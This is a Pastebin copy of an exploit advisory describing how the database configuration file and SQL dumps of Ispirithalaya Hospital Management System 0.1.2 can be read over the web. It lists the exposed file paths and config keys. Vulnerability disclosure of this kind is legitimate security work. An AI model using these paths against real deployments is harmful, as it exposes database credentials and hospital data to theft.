Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Ispirithalaya Hospital Management System 0.1.2 Database Config Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : freeehospital.com
- # Software Download Link : sourceforge.net/projects/ispirithalaya/files/latest/download
- # Software Information Link : sourceforge.net/projects/ispirithalaya/
- # Software Version : 0.1.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Ispirithalaya system has e channeling, checking , lab test, reservation.
- It is written by zend php framework and mysql db. doctors and patients
- can log the system and chat. It has payment gateway integration.
- ####################################################################
- # Impact :
- ***********
- Ispirithalaya Hospital Management System 0.1.2 [ and other versions ] configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file that Ispirithalaya Hospital Management System 0.1.2 stored in /application/configs/application.ini
- HTTP requests consisting of a single character will cause the software to
- disclose sensitive configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration
- file also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- ####################################################################
- # Database Config Disclosure Exploit :
- *********************************
- /application/configs/application.ini
- resources.db.adapter =
- resources.db.params.host =
- resources.db.params.username =
- resources.db.params.password =
- resources.db.params.dbname =
- /data/db/ispirithalaya-data.sql
- -- phpMyAdmin SQL Dump
- -- version 3.3.9
- -- phpmyadmin.net
- --
- -- Host: localhost
- -- Generation Time: Oct 18, 2011 at 05:21 PM
- -- Server version: 5.5.8
- -- PHP Version: 5.3.5
- /data/db/ispirithalaya.sql
- - phpMyAdmin SQL Dump
- -- version 3.3.10deb1
- -- phpmyadmin.net
- --
- -- Host: localhost
- -- Generation Time: Oct 15, 2011 at 11:31 AM
- -- Server version: 5.1.54
- -- PHP Version: 5.3.5-1ubuntu7.2
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement